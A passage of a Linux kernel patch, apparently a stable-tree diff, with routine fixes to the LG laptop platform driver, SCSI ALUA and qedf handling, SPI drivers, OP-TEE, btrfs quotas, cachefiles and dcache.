++	r = lg_wmab(dev, WM_FAN_MODE, WM_SET, (m & 0xffffff0f) | (value << 4));
+ 	kfree(r);
+-	r = lg_wmab(WM_FAN_MODE, WM_SET, (m & 0xfffffff0) | value);
++	r = lg_wmab(dev, WM_FAN_MODE, WM_SET, (m & 0xfffffff0) | value);
+ 	kfree(r);
+ 
+ 	return count;
+@@ -320,7 +296,7 @@ static ssize_t fan_mode_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_FAN_MODE, WM_GET, 0);
++	r = lg_wmab(dev, WM_FAN_MODE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -347,7 +323,7 @@ static ssize_t usb_charge_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmbb(WMBB_USB_CHARGE, WM_SET, value);
++	r = lg_wmbb(dev, WMBB_USB_CHARGE, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -361,7 +337,7 @@ static ssize_t usb_charge_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmbb(WMBB_USB_CHARGE, WM_GET, 0);
++	r = lg_wmbb(dev, WMBB_USB_CHARGE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -389,7 +365,7 @@ static ssize_t reader_mode_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmab(WM_READER_MODE, WM_SET, value);
++	r = lg_wmab(dev, WM_READER_MODE, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -403,7 +379,7 @@ static ssize_t reader_mode_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_READER_MODE, WM_GET, 0);
++	r = lg_wmab(dev, WM_READER_MODE, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -431,7 +407,7 @@ static ssize_t fn_lock_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	r = lg_wmab(WM_FN_LOCK, WM_SET, value);
++	r = lg_wmab(dev, WM_FN_LOCK, WM_SET, value);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -445,7 +421,7 @@ static ssize_t fn_lock_show(struct device *dev,
+ 	unsigned int status;
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_FN_LOCK, WM_GET, 0);
++	r = lg_wmab(dev, WM_FN_LOCK, WM_GET, 0);
+ 	if (!r)
+ 		return -EIO;
+ 
+@@ -475,9 +451,9 @@ static ssize_t charge_control_end_threshold_store(struct device *dev,
+ 		union acpi_object *r;
+ 
+ 		if (battery_limit_use_wmbb)
+-			r = lg_wmbb(WMBB_BATT_LIMIT, WM_SET, value);
++			r = lg_wmbb(&pf_device->dev, WMBB_BATT_LIMIT, WM_SET, value);
+ 		else
+-			r = lg_wmab(WM_BATT_LIMIT, WM_SET, value);
++			r = lg_wmab(&pf_device->dev, WM_BATT_LIMIT, WM_SET, value);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -496,7 +472,7 @@ static ssize_t charge_control_end_threshold_show(struct device *device,
+ 	union acpi_object *r;
+ 
+ 	if (battery_limit_use_wmbb) {
+-		r = lg_wmbb(WMBB_BATT_LIMIT, WM_GET, 0);
++		r = lg_wmbb(&pf_device->dev, WMBB_BATT_LIMIT, WM_GET, 0);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -507,7 +483,7 @@ static ssize_t charge_control_end_threshold_show(struct device *device,
+ 
+ 		status = r->buffer.pointer[0x10];
+ 	} else {
+-		r = lg_wmab(WM_BATT_LIMIT, WM_GET, 0);
++		r = lg_wmab(&pf_device->dev, WM_BATT_LIMIT, WM_GET, 0);
+ 		if (!r)
+ 			return -EIO;
+ 
+@@ -586,7 +562,7 @@ static void tpad_led_set(struct led_classdev *cdev,
+ {
+ 	union acpi_object *r;
+ 
+-	r = lg_wmab(WM_TLED, WM_SET, brightness > LED_OFF);
++	r = lg_wmab(cdev->dev->parent, WM_TLED, WM_SET, brightness > LED_OFF);
+ 	kfree(r);
+ }
+ 
+@@ -608,16 +584,16 @@ static void kbd_backlight_set(struct led_classdev *cdev,
+ 		val = 0;
+ 	if (brightness >= LED_FULL)
+ 		val = 0x24;
+-	r = lg_wmab(WM_KEY_LIGHT, WM_SET, val);
++	r = lg_wmab(cdev->dev->parent, WM_KEY_LIGHT, WM_SET, val);
+ 	kfree(r);
+ }
+ 
+-static enum led_brightness get_kbd_backlight_level(void)
++static enum led_brightness get_kbd_backlight_level(struct device *dev)
+ {
+ 	union acpi_object *r;
+ 	int val;
+ 
+-	r = lg_wmab(WM_KEY_LIGHT, WM_GET, 0);
++	r = lg_wmab(dev, WM_KEY_LIGHT, WM_GET, 0);
+ 
+ 	if (!r)
+ 		return LED_OFF;
+@@ -645,7 +621,7 @@ static enum led_brightness get_kbd_backlight_level(void)
+ 
+ static enum led_brightness kbd_backlight_get(struct led_classdev *cdev)
+ {
+-	return get_kbd_backlight_level();
++	return get_kbd_backlight_level(cdev->dev->parent);
+ }
+ 
+ static LED_DEVICE(kbd_backlight, 255, LED_BRIGHT_HW_CHANGED);
+@@ -672,6 +648,11 @@ static struct platform_driver pf_driver = {
+ 
+ static int acpi_add(struct acpi_device *device)
+ {
++	struct platform_device_info pdev_info = {
++		.fwnode = acpi_fwnode_handle(device),
++		.name = PLATFORM_NAME,
++		.id = PLATFORM_DEVID_NONE,
++	};
+ 	int ret;
+ 	const char *product;
+ 	int year = 2017;
+@@ -683,9 +664,7 @@ static int acpi_add(struct acpi_device *device)
+ 	if (ret)
+ 		return ret;
+ 
+-	pf_device = platform_device_register_simple(PLATFORM_NAME,
+-						    PLATFORM_DEVID_NONE,
+-						    NULL, 0);
++	pf_device = platform_device_register_full(&pdev_info);
+ 	if (IS_ERR(pf_device)) {
+ 		ret = PTR_ERR(pf_device);
+ 		pf_device = NULL;
+@@ -778,7 +757,7 @@ static int acpi_remove(struct acpi_device *device)
+ }
+ 
+ static const struct acpi_device_id device_ids[] = {
+-	{"LGEX0815", 0},
++	{"LGEX0820", 0},
+ 	{"", 0}
+ };
+ MODULE_DEVICE_TABLE(acpi, device_ids);
+diff --git a/drivers/platform/x86/wireless-hotkey.c b/drivers/platform/x86/wireless-hotkey.c
+index 11c60a2734468..61ae722643e5a 100644
+--- a/drivers/platform/x86/wireless-hotkey.c
++++ b/drivers/platform/x86/wireless-hotkey.c
+@@ -19,6 +19,7 @@ MODULE_AUTHOR("Alex Hung");
+ MODULE_ALIAS("acpi*:HPQ6001:*");
+ MODULE_ALIAS("acpi*:WSTADEF:*");
+ MODULE_ALIAS("acpi*:AMDI0051:*");
++MODULE_ALIAS("acpi*:LGEX0815:*");
+ 
+ static struct input_dev *wl_input_dev;
+ 
+@@ -26,6 +27,7 @@ static const struct acpi_device_id wl_ids[] = {
+ 	{"HPQ6001", 0},
+ 	{"WSTADEF", 0},
+ 	{"AMDI0051", 0},
++	{"LGEX0815", 0},
+ 	{"", 0},
+ };
+ 
+diff --git a/drivers/s390/char/sclp.c b/drivers/s390/char/sclp.c
+index ae1d6ee382a50..889d719c2d1f9 100644
+--- a/drivers/s390/char/sclp.c
++++ b/drivers/s390/char/sclp.c
+@@ -1290,6 +1290,7 @@ sclp_init(void)
+ fail_unregister_reboot_notifier:
+ 	unregister_reboot_notifier(&sclp_reboot_notifier);
+ fail_init_state_uninitialized:
++	list_del(&sclp_state_change_event.list);
+ 	sclp_init_state = sclp_init_state_uninitialized;
+ 	free_page((unsigned long) sclp_read_sccb);
+ 	free_page((unsigned long) sclp_init_sccb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 0781f991e7845..f5fc8631883d5 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -406,28 +406,40 @@ static char print_alua_state(unsigned char state)
+ 	}
+ }
+ 
+-static enum scsi_disposition alua_check_sense(struct scsi_device *sdev,
+-					      struct scsi_sense_hdr *sense_hdr)
++static void alua_handle_state_transition(struct scsi_device *sdev)
+ {
+ 	struct alua_dh_data *h = sdev->handler_data;
+ 	struct alua_port_group *pg;
+ 
++	rcu_read_lock();
++	pg = rcu_dereference(h->pg);
++	if (pg)
++		pg->state = SCSI_ACCESS_STATE_TRANSITIONING;
++	rcu_read_unlock();
++	alua_check(sdev, false);
++}
++
++static enum scsi_disposition alua_check_sense(struct scsi_device *sdev,
++					      struct scsi_sense_hdr *sense_hdr)
++{
+ 	switch (sense_hdr->sense_key) {
+ 	case NOT_READY:
+ 		if (sense_hdr->asc == 0x04 && sense_hdr->ascq == 0x0a) {
+ 			/*
+ 			 * LUN Not Accessible - ALUA state transition
+ 			 */
+-			rcu_read_lock();
+-			pg = rcu_dereference(h->pg);
+-			if (pg)
+-				pg->state = SCSI_ACCESS_STATE_TRANSITIONING;
+-			rcu_read_unlock();
+-			alua_check(sdev, false);
++			alua_handle_state_transition(sdev);
+ 			return NEEDS_RETRY;
+ 		}
+ 		break;
+ 	case UNIT_ATTENTION:
++		if (sense_hdr->asc == 0x04 && sense_hdr->ascq == 0x0a) {
++			/*
++			 * LUN Not Accessible - ALUA state transition
++			 */
++			alua_handle_state_transition(sdev);
++			return NEEDS_RETRY;
++		}
+ 		if (sense_hdr->asc == 0x29 && sense_hdr->ascq == 0x00) {
+ 			/*
+ 			 * Power On, Reset, or Bus Device Reset.
+@@ -494,7 +506,8 @@ static int alua_tur(struct scsi_device *sdev)
+ 
+ 	retval = scsi_test_unit_ready(sdev, ALUA_FAILOVER_TIMEOUT * HZ,
+ 				      ALUA_FAILOVER_RETRIES, &sense_hdr);
+-	if (sense_hdr.sense_key == NOT_READY &&
++	if ((sense_hdr.sense_key == NOT_READY ||
++	     sense_hdr.sense_key == UNIT_ATTENTION) &&
+ 	    sense_hdr.asc == 0x04 && sense_hdr.ascq == 0x0a)
+ 		return SCSI_DH_RETRY;
+ 	else if (retval)
+diff --git a/drivers/scsi/libsas/sas_internal.h b/drivers/scsi/libsas/sas_internal.h
+index a94bd0790b055..6ddccc67e808f 100644
+--- a/drivers/scsi/libsas/sas_internal.h
++++ b/drivers/scsi/libsas/sas_internal.h
+@@ -119,6 +119,20 @@ static inline void sas_fail_probe(struct domain_device *dev, const char *func, i
+ 		func, dev->parent ? "exp-attached" :
+ 		"direct-attached",
+ 		SAS_ADDR(dev->sas_addr), err);
++
++	/*
++	 * If the device probe failed, the expander phy attached address
++	 * needs to be reset so that the phy will not be treated as flutter
++	 * in the next revalidation
++	 */
++	if (dev->parent && !dev_is_expander(dev->dev_type)) {
++		struct sas_phy *phy = dev->phy;
++		struct domain_device *parent = dev->parent;
++		struct ex_phy *ex_phy = &parent->ex_dev.ex_phy[phy->number];
++
++		memset(ex_phy->attached_sas_addr, 0, SAS_ADDR_SIZE);
++	}
++
+ 	sas_unregister_dev(dev->port, dev);
+ }
+ 
+diff --git a/drivers/scsi/qedf/qedf.h b/drivers/scsi/qedf/qedf.h
+index c5c0bbdafc4ea..81b84757faae0 100644
+--- a/drivers/scsi/qedf/qedf.h
++++ b/drivers/scsi/qedf/qedf.h
+@@ -362,6 +362,7 @@ struct qedf_ctx {
+ #define QEDF_IN_RECOVERY		5
+ #define QEDF_DBG_STOP_IO		6
+ #define QEDF_PROBING			8
++#define QEDF_STAG_IN_PROGRESS		9
+ 	unsigned long flags; /* Miscellaneous state flags */
+ 	int fipvlan_retries;
+ 	u8 num_queues;
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index d969b0dc97326..179967774cc8c 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -318,11 +318,18 @@ static struct fc_seq *qedf_elsct_send(struct fc_lport *lport, u32 did,
+ 	 */
+ 	if (resp == fc_lport_flogi_resp) {
+ 		qedf->flogi_cnt++;
++		qedf->flogi_pending++;
++
++		if (test_bit(QEDF_UNLOADING, &qedf->flags)) {
++			QEDF_ERR(&qedf->dbg_ctx, "Driver unloading\n");
++			qedf->flogi_pending = 0;
++		}
++
+ 		if (qedf->flogi_pending >= QEDF_FLOGI_RETRY_CNT) {
+ 			schedule_delayed_work(&qedf->stag_work, 2);
+ 			return NULL;
+ 		}
+-		qedf->flogi_pending++;
++
+ 		return fc_elsct_send(lport, did, fp, op, qedf_flogi_resp,
+ 		    arg, timeout);
+ 	}
+@@ -911,13 +918,14 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 	struct qedf_ctx *qedf;
+ 	struct qed_link_output if_link;
+ 
++	qedf = lport_priv(lport);
++
+ 	if (lport->vport) {
++		clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ 		printk_ratelimited("Cannot issue host reset on NPIV port.\n");
+ 		return;
+ 	}
+ 
+-	qedf = lport_priv(lport);
+-
+ 	qedf->flogi_pending = 0;
+ 	/* For host reset, essentially do a soft link up/down */
+ 	atomic_set(&qedf->link_state, QEDF_LINK_DOWN);
+@@ -937,6 +945,7 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 	if (!if_link.link_up) {
+ 		QEDF_INFO(&qedf->dbg_ctx, QEDF_LOG_DISC,
+ 			  "Physical link is not up.\n");
++		clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ 		return;
+ 	}
+ 	/* Flush and wait to make sure link down is processed */
+@@ -949,6 +958,7 @@ void qedf_ctx_soft_reset(struct fc_lport *lport)
+ 		  "Queue link up work.\n");
+ 	queue_delayed_work(qedf->link_update_wq, &qedf->link_update,
+ 	    0);
++	clear_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
+ }
+ 
+ /* Reset the host by gracefully logging out and then logging back in */
+@@ -3467,6 +3477,7 @@ static int __qedf_probe(struct pci_dev *pdev, int mode)
+ 	}
+ 
+ 	/* Start the Slowpath-process */
++	memset(&slowpath_params, 0, sizeof(struct qed_slowpath_params));
+ 	slowpath_params.int_mode = QED_INT_MODE_MSIX;
+ 	slowpath_params.drv_major = QEDF_DRIVER_MAJOR_VER;
+ 	slowpath_params.drv_minor = QEDF_DRIVER_MINOR_VER;
+@@ -3725,6 +3736,7 @@ static void __qedf_remove(struct pci_dev *pdev, int mode)
+ {
+ 	struct qedf_ctx *qedf;
+ 	int rc;
++	int cnt = 0;
+ 
+ 	if (!pdev) {
+ 		QEDF_ERR(NULL, "pdev is NULL.\n");
+@@ -3742,6 +3754,17 @@ static void __qedf_remove(struct pci_dev *pdev, int mode)
+ 		return;
+ 	}
+ 
++stag_in_prog:
++	if (test_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx, "Stag in progress, cnt=%d.\n", cnt);
++		cnt++;
++
++		if (cnt < 5) {
++			msleep(500);
++			goto stag_in_prog;
++		}
++	}
++
+ 	if (mode != QEDF_MODE_RECOVERY)
+ 		set_bit(QEDF_UNLOADING, &qedf->flags);
+ 
+@@ -4001,6 +4024,24 @@ void qedf_stag_change_work(struct work_struct *work)
+ 	struct qedf_ctx *qedf =
+ 	    container_of(work, struct qedf_ctx, stag_work.work);
+ 
++	if (!qedf) {
++		QEDF_ERR(&qedf->dbg_ctx, "qedf is NULL");
++		return;
++	}
++
++	if (test_bit(QEDF_IN_RECOVERY, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx,
++			 "Already is in recovery, hence not calling software context reset.\n");
++		return;
++	}
++
++	if (test_bit(QEDF_UNLOADING, &qedf->flags)) {
++		QEDF_ERR(&qedf->dbg_ctx, "Driver unloading\n");
++		return;
++	}
++
++	set_bit(QEDF_STAG_IN_PROGRESS, &qedf->flags);
++
+ 	printk_ratelimited("[%s]:[%s:%d]:%d: Performing software context reset.",
+ 			dev_name(&qedf->pdev->dev), __func__, __LINE__,
+ 			qedf->dbg_ctx.host_no);
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index 2c660a95c17e7..93e83fbc3403f 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1040,7 +1040,7 @@ static struct spi_imx_devtype_data imx35_cspi_devtype_data = {
+ 	.rx_available = mx31_rx_available,
+ 	.reset = mx31_reset,
+ 	.fifo_size = 8,
+-	.has_dmamode = true,
++	.has_dmamode = false,
+ 	.dynamic_burst = false,
+ 	.has_slavemode = false,
+ 	.devtype = IMX35_CSPI,
+diff --git a/drivers/spi/spi-mux.c b/drivers/spi/spi-mux.c
+index 0709e987bd5ab..465d5b0e1d1a9 100644
+--- a/drivers/spi/spi-mux.c
++++ b/drivers/spi/spi-mux.c
+@@ -156,6 +156,7 @@ static int spi_mux_probe(struct spi_device *spi)
+ 	/* supported modes are the same as our parent's */
+ 	ctlr->mode_bits = spi->controller->mode_bits;
+ 	ctlr->flags = spi->controller->flags;
++	ctlr->bits_per_word_mask = spi->controller->bits_per_word_mask;
+ 	ctlr->transfer_one_message = spi_mux_transfer_one_message;
+ 	ctlr->setup = spi_mux_setup;
+ 	ctlr->num_chipselect = mux_control_states(priv->mux);
+diff --git a/drivers/tee/optee/ffa_abi.c b/drivers/tee/optee/ffa_abi.c
+index 0828240f27e62..b8ba360e863ed 100644
+--- a/drivers/tee/optee/ffa_abi.c
++++ b/drivers/tee/optee/ffa_abi.c
+@@ -657,7 +657,9 @@ static bool optee_ffa_api_is_compatbile(struct ffa_device *ffa_dev,
+ 					const struct ffa_ops *ops)
+ {
+ 	const struct ffa_msg_ops *msg_ops = ops->msg_ops;
+-	struct ffa_send_direct_data data = { OPTEE_FFA_GET_API_VERSION };
++	struct ffa_send_direct_data data = {
++		.data0 = OPTEE_FFA_GET_API_VERSION,
++	};
+ 	int rc;
+ 
+ 	msg_ops->mode_32bit_set(ffa_dev);
+@@ -674,7 +676,9 @@ static bool optee_ffa_api_is_compatbile(struct ffa_device *ffa_dev,
+ 		return false;
+ 	}
+ 
+-	data = (struct ffa_send_direct_data){ OPTEE_FFA_GET_OS_VERSION };
++	data = (struct ffa_send_direct_data){
++		.data0 = OPTEE_FFA_GET_OS_VERSION,
++	};
+ 	rc = msg_ops->sync_send_receive(ffa_dev, &data);
+ 	if (rc) {
+ 		pr_err("Unexpected error %d\n", rc);
+@@ -694,7 +698,9 @@ static bool optee_ffa_exchange_caps(struct ffa_device *ffa_dev,
+ 				    u32 *sec_caps,
+ 				    unsigned int *rpc_param_count)
+ {
+-	struct ffa_send_direct_data data = { OPTEE_FFA_EXCHANGE_CAPABILITIES };
++	struct ffa_send_direct_data data = {
++		.data0 = OPTEE_FFA_EXCHANGE_CAPABILITIES,
++	};
+ 	int rc;
+ 
+ 	rc = ops->msg_ops->sync_send_receive(ffa_dev, &data);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 80ca7b435b0d1..e482889667ec9 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1222,7 +1222,7 @@ int btrfs_quota_enable(struct btrfs_fs_info *fs_info)
+ 
+ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ {
+-	struct btrfs_root *quota_root;
++	struct btrfs_root *quota_root = NULL;
+ 	struct btrfs_trans_handle *trans = NULL;
+ 	int ret = 0;
+ 
+@@ -1317,9 +1317,9 @@ int btrfs_quota_disable(struct btrfs_fs_info *fs_info)
+ 	btrfs_free_tree_block(trans, btrfs_root_id(quota_root),
+ 			      quota_root->node, 0, 1);
+ 
+-	btrfs_put_root(quota_root);
+ 
+ out:
++	btrfs_put_root(quota_root);
+ 	mutex_unlock(&fs_info->qgroup_ioctl_lock);
+ 	if (ret && trans)
+ 		btrfs_end_transaction(trans);
+diff --git a/fs/cachefiles/cache.c b/fs/cachefiles/cache.c
+index f449f7340aad0..9fb06dc165202 100644
+--- a/fs/cachefiles/cache.c
++++ b/fs/cachefiles/cache.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <linux/statfs.h>
+ #include <linux/namei.h>
++#include <trace/events/fscache.h>
+ #include "internal.h"
+ 
+ /*
+@@ -312,19 +313,59 @@ static void cachefiles_withdraw_objects(struct cachefiles_cache *cache)
+ }
+ 
+ /*
+- * Withdraw volumes.
++ * Withdraw fscache volumes.
++ */
++static void cachefiles_withdraw_fscache_volumes(struct cachefiles_cache *cache)
++{
++	struct list_head *cur;
++	struct cachefiles_volume *volume;
++	struct fscache_volume *vcookie;
++
++	_enter("");
++retry:
++	spin_lock(&cache->object_list_lock);
++	list_for_each(cur, &cache->volumes) {
++		volume = list_entry(cur, struct cachefiles_volume, cache_link);
++
++		if (atomic_read(&volume->vcookie->n_accesses) == 0)
++			continue;
++
++		vcookie = fscache_try_get_volume(volume->vcookie,
++						 fscache_volume_get_withdraw);
++		if (vcookie) {
++			spin_unlock(&cache->object_list_lock);
++			fscache_withdraw_volume(vcookie);
++			fscache_put_volume(vcookie, fscache_volume_put_withdraw);
++			goto retry;
++		}
++	}
++	spin_unlock(&cache->object_list_lock);
++
++	_leave("");
++}
++
++/*
++ * Withdraw cachefiles volumes.
+  */
+ static void cachefiles_withdraw_volumes(struct cachefiles_cache *cache)
+ {
+ 	_enter("");
+ 
+ 	for (;;) {
++		struct fscache_volume *vcookie = NULL;
+ 		struct cachefiles_volume *volume = NULL;
+ 
+ 		spin_lock(&cache->object_list_lock);
+ 		if (!list_empty(&cache->volumes)) {
+ 			volume = list_first_entry(&cache->volumes,
+ 						  struct cachefiles_volume, cache_link);
++			vcookie = fscache_try_get_volume(volume->vcookie,
++							 fscache_volume_get_withdraw);
++			if (!vcookie) {
++				spin_unlock(&cache->object_list_lock);
++				cpu_relax();
++				continue;
++			}
+ 			list_del_init(&volume->cache_link);
+ 		}
+ 		spin_unlock(&cache->object_list_lock);
+@@ -332,6 +373,7 @@ static void cachefiles_withdraw_volumes(struct cachefiles_cache *cache)
+ 			break;
+ 
+ 		cachefiles_withdraw_volume(volume);
++		fscache_put_volume(vcookie, fscache_volume_put_withdraw);
+ 	}
+ 
+ 	_leave("");
+@@ -371,6 +413,7 @@ void cachefiles_withdraw_cache(struct cachefiles_cache *cache)
+ 	pr_info("File cache on %s unregistering\n", fscache->name);
+ 
+ 	fscache_withdraw_cache(fscache);
++	cachefiles_withdraw_fscache_volumes(cache);
+ 
+ 	/* we now have to destroy all the active objects pertaining to this
+ 	 * cache - which we do by passing them off to thread pool to be
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 51173ab6dbd84..2185e2908dba8 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -97,12 +97,12 @@ static loff_t cachefiles_ondemand_fd_llseek(struct file *filp, loff_t pos,
+ }
+ 
+ static long cachefiles_ondemand_fd_ioctl(struct file *filp, unsigned int ioctl,
+-					 unsigned long arg)
++					 unsigned long id)
+ {
+ 	struct cachefiles_object *object = filp->private_data;
+ 	struct cachefiles_cache *cache = object->volume->cache;
+ 	struct cachefiles_req *req;
+-	unsigned long id;
++	XA_STATE(xas, &cache->reqs, id);
+ 
+ 	if (ioctl != CACHEFILES_IOC_READ_COMPLETE)
+ 		return -EINVAL;
+@@ -110,10 +110,15 @@ static long cachefiles_ondemand_fd_ioctl(struct file *filp, unsigned int ioctl,
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return -EOPNOTSUPP;
+ 
+-	id = arg;
+-	req = xa_erase(&cache->reqs, id);
+-	if (!req)
++	xa_lock(&cache->reqs);
++	req = xas_load(&xas);
++	if (!req || req->msg.opcode != CACHEFILES_OP_READ ||
++	    req->object != object) {
++		xa_unlock(&cache->reqs);
+ 		return -EINVAL;
++	}
++	xas_store(&xas, NULL);
++	xa_unlock(&cache->reqs);
+ 
+ 	trace_cachefiles_ondemand_cread(object, id);
+ 	complete(&req->done);
+@@ -142,6 +147,7 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	unsigned long id;
+ 	long size;
+ 	int ret;
++	XA_STATE(xas, &cache->reqs, 0);
+ 
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return -EOPNOTSUPP;
+@@ -165,10 +171,18 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	if (ret)
+ 		return ret;
+ 
+-	req = xa_erase(&cache->reqs, id);
+-	if (!req)
++	xa_lock(&cache->reqs);
++	xas.xa_index = id;
++	req = xas_load(&xas);
++	if (!req || req->msg.opcode != CACHEFILES_OP_OPEN ||
++	    !req->object->ondemand->ondemand_id) {
++		xa_unlock(&cache->reqs);
+ 		return -EINVAL;
++	}
++	xas_store(&xas, NULL);
++	xa_unlock(&cache->reqs);
+ 
++	info = req->object->ondemand;
+ 	/* fail OPEN request if copen format is invalid */
+ 	ret = kstrtol(psize, 0, &size);
+ 	if (ret) {
+@@ -188,7 +202,6 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		goto out;
+ 	}
+ 
+-	info = req->object->ondemand;
+ 	spin_lock(&info->lock);
+ 	/*
+ 	 * The anonymous fd was closed before copen ? Fail the request.
+@@ -228,6 +241,11 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 	wake_up_all(&cache->daemon_pollwq);
+ 
+ out:
++	spin_lock(&info->lock);
++	/* Need to set object close to avoid reopen status continuing */
++	if (info->ondemand_id == CACHEFILES_ONDEMAND_ID_CLOSED)
++		cachefiles_ondemand_set_object_close(req->object);
++	spin_unlock(&info->lock);
+ 	complete(&req->done);
+ 	return ret;
+ }
+@@ -362,6 +380,20 @@ static struct cachefiles_req *cachefiles_ondemand_select_req(struct xa_state *xa
+ 	return NULL;
+ }
+ 
++static inline bool cachefiles_ondemand_finish_req(struct cachefiles_req *req,
++						  struct xa_state *xas, int err)
++{
++	if (unlikely(!xas || !req))
++		return false;
++
++	if (xa_cmpxchg(xas->xa, xas->xa_index, req, NULL, 0) != req)
++		return false;
++
++	req->error = err;
++	complete(&req->done);
++	return true;
++}
++
+ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+ {
+@@ -425,16 +457,8 @@ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ out:
+ 	cachefiles_put_object(req->object, cachefiles_obj_put_read_req);
+ 	/* Remove error request and CLOSE request has no reply */
+-	if (ret || msg->opcode == CACHEFILES_OP_CLOSE) {
+-		xas_reset(&xas);
+-		xas_lock(&xas);
+-		if (xas_load(&xas) == req) {
+-			req->error = ret;
+-			complete(&req->done);
+-			xas_store(&xas, NULL);
+-		}
+-		xas_unlock(&xas);
+-	}
++	if (ret || msg->opcode == CACHEFILES_OP_CLOSE)
++		cachefiles_ondemand_finish_req(req, &xas, ret);
+ 	cachefiles_req_put(req);
+ 	return ret ? ret : n;
+ }
+@@ -539,8 +563,18 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		goto out;
+ 
+ 	wake_up_all(&cache->daemon_pollwq);
+-	wait_for_completion(&req->done);
+-	ret = req->error;
++wait:
++	ret = wait_for_completion_killable(&req->done);
++	if (!ret) {
++		ret = req->error;
++	} else {
++		ret = -EINTR;
++		if (!cachefiles_ondemand_finish_req(req, &xas, ret)) {
++			/* Someone will complete it soon. */
++			cpu_relax();
++			goto wait;
++		}
++	}
+ 	cachefiles_req_put(req);
+ 	return ret;
+ out:
+diff --git a/fs/cachefiles/volume.c b/fs/cachefiles/volume.c
+index 89df0ba8ba5e7..781aac4ef274b 100644
+--- a/fs/cachefiles/volume.c
++++ b/fs/cachefiles/volume.c
+@@ -133,7 +133,6 @@ void cachefiles_free_volume(struct fscache_volume *vcookie)
+ 
+ void cachefiles_withdraw_volume(struct cachefiles_volume *volume)
+ {
+-	fscache_withdraw_volume(volume->vcookie);
+ 	cachefiles_set_volume_xattr(volume);
+ 	__cachefiles_free_volume(volume);
+ }
+diff --git a/fs/dcache.c b/fs/dcache.c
+index 04f32dc8d1ad8..49461353ac37b 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -3209,28 +3209,25 @@ EXPORT_SYMBOL(d_splice_alias);
+   
+ bool is_subdir(struct dentry *new_dentry, struct dentry *old_dentry)
+ {
+-	bool result;
++	bool subdir;
+ 	unsigned seq;
+ 
+ 	if (new_dentry == old_dentry)
+ 		return true;
+ 
+-	do {
+-		/* for restarting inner loop in case of seq retry */
+-		seq = read_seqbegin(&rename_lock);
+-		/*
+-		 * Need rcu_readlock to protect against the d_parent trashing
+-		 * due to d_move
+-		 */
+-		rcu_read_lock();
+-		if (d_ancestor(old_dentry, new_dentry))
+-			result = true;
+-		else
+-			result = false;
+-		rcu_read_unlock();
+-	} while (read_seqretry(&rename_lock, seq));
+-
+-	return result;
++	/* Access d_parent under rcu as d_move() may change it. */
++	rcu_read_lock();
++	seq = read_seqbegin(&rename_lock);
++	subdir = d_ancestor(old_dentry, new_dentry);
++	 /* Try lockless once... */
++	if (read_seqretry(&rename_lock, seq)) {
++		/* ...else acquire lock for progress even on deep chains. */
++		read_seqlock_excl(&rename_lock);
++		subdir = d_ancestor(old_dentry, new_dentry);
++		read_sequnlock_excl(&rename_lock);
++	}
++	rcu_read_unlock();
++	return subdir;
+ }
+ EXPORT_SYMBOL(is_subdir);
+ 
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index abcded1acd194..4864863cd1298 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
